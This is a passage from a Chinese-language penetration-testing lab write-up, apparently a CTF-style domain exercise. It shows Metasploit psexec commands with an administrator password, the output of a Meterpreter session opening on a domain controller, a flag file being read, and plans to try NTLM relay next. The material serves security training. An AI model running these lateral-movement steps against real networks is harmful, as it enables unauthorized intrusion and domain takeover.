Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).失败
再尝试
Psexec1
2
3
4
5
6
7
8
9
10
11
12
13
14
15msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUSER administrator
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.10
msf6 exploit(windows/smb/psexec) > set SMBPass zxcASDqw123!!
msf6 exploit(windows/smb/psexec) > set lport 4445
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.10:445 - Connecting to the server...
[*] 192.168.93.10:445 - Authenticating to 192.168.93.10:445 as user 'administrator'...
[*] 192.168.93.10:445 - Selecting PowerShell target
[*] 192.168.93.10:445 - Executing the payload...
[+] 192.168.93.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.10:4445
[*] Sending stage (176198 bytes) to 192.168.93.10
[*] Meterpreter session 4 opened (192.168.93.100:51849 -> 192.168.93.10:4445 via session 2) at 2024-11-28 15:58:06 +0800
meterpreter >成功了,拿到了域控的
shell!!最后发现可以先远程到win2008然后再远程到域控
/image48.png)
读取Flag文件
1 | C:\Users\Administrator\Documents>dir |
/image49.png)
总结
ew代理使用,更熟悉MSF框架,以及域内有linux和windows两种系统渗透,其实除了爆破还有NTLM中继的思路,但是还没有实现,接着就去实现NTLM中继